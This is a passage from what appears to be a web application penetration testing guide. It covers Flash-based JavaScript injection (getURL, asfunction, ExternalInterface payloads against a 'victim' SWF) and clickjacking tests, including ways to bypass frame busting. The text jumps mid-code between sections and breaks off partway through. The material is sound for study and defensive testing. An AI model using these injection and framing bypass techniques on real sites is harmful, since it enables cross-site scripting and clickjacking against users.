The GetURL function in ActionScript 2.0 and NavigateToURL in ActionScript 3.0 lets the movie load a URI into the browser’s window.
So if an undefined variable is used as the first argument for getURL:
getURL(_root.URI,’_targetFrame’);
Or if a FlashVar is used as the parameter that is passed to a naviga-
teToURL function:
var request:URLRequest = new URLRequest(FlashVarSuppliedURL);
navigateToURL(request);
Then this will mean it’s possible to call JavaScript in the same domain
where the movie is hosted by requesting:
http://victim/file.swf?URI=javascript:evilcode
getURL(‘javascript:evilcode’,’_self’);
The same when only some part of getURL is controlled:
Dom Injection with Flash JavaScript injection
getUrl(‘javascript:function(‘+_root.arg+’))
asfunction:
You can use the special asfunction protocol to cause the link to execute an ActionScript function in a SWF file instead of opening a URL.
Until release Flash Player 9 r48 asfunction could be used on every
method which has a URL as an argument. After that release, asfunction was restricted to use within an HTML TextField.
This means that a tester could try to inject:
asfunction:getURL,javascript:evilcode
in every unsafe method like:
loadMovie(_root.URL)
by requesting:
http://victim/file.swf?URL=asfunction:getURL,javascript:evilcode
ExternalInterface:
ExternalInterface.call is a static method introduced by Adobe to improve player/browser interaction for both ActionScript 2.0 and ActionScript 3.0.
From a security point of view it could be abused when part of its argument could be controlled:
flash.external.ExternalInterface.call(_root.callback);
the attack pattern for this kind of flaw should be something like
the following:
eval(evilcode)
199
Web Application Penetration Testing
since the internal JavaScript which is executed by the browser
will be something similar to:
eval(‘try { __flash__toXML(‘+__root.callback+’) ; } catch (e) {
“Website is vulnerable to clickjacking!
Result Expected: If you can see both the text “Website is vulnerable to clickjacking!” at the top of the page and your target web page successfully loaded into the frame, then your site is vulnerable and has no type of protection against Clickjacking attacks. Now you can directly create a “proof of concept” to demonstrate that an attacker could exploit this vulnerability. Bypass Clickjacking protection: In case in which you only see the target site or the text “Website is vulnerable to clickjacking!” but nothing in the iframe this mean that the target probably has some form of protection against clickjacking. It’s important to note that this isn’t a guarantee that the page is totally immune to clickjacking. Methods to protect a web page from clickjacking can be divided in two macro-categories: • Client side protection: Frame Busting • Server side protection: X-Frame-Options In some circumstances, every single type of defense could be bypassed. Following are presented the main methods of protection from these attacks and techniques to bypass them. Client side protection: Frame Busting The most common client side method, that has been developed to protect a web page from clickjacking, is called Frame Busting and it consists of a script in each page that should not be framed. The aim of this technique is to prevent a site from functioning when it is loaded inside a frame. The structure of frame busting code typically consists of a “conditional statement” and a “counter-action” statement. For this type of protection, there are some work arounds that fall under the name of “Bust frame busting”. Some of this techniques are browser-specific while others work across browsers. Mobile website version Mobile versions of the website are usually smaller and faster than the desktop ones, and they have to be less complex than the main application. Mobile variants have often less protection since there is the wrong assumption that an attacker could not attack an application by the smart phone. This is fundamentally wrong, because an attacker can fake the real origin given by a web browser, such that a non-mobile victim may be able to visit an application made for mobile users. From this assumption follows that in some cases it is not necessary to use techniques to evade frame busting when there are unprotected alternatives, which allow the use of same attack vectors. Double Framing Some frame busting techniques try to break frame by assigning a value to the “parent.location” attribute in the “counter-action” statement. Such actions are, for example: • self.parent.location = document.location • parent.location.href = self.location • parent.location = self.location This method works well until the target page is framed by a single page. However, if the attacker encloses the target web page in one frame which is nested in another one (a double frame), then trying to access to “parent.location” becomes a security violation in all popular browsers, due to the descendant frame navigation policy. This security violation disables the counter-action navigation. Target site frame busting code (target site): if(top.location!=self.locaton) { parent.location = self.location; } Attacker’s top frame (fictitious2.html):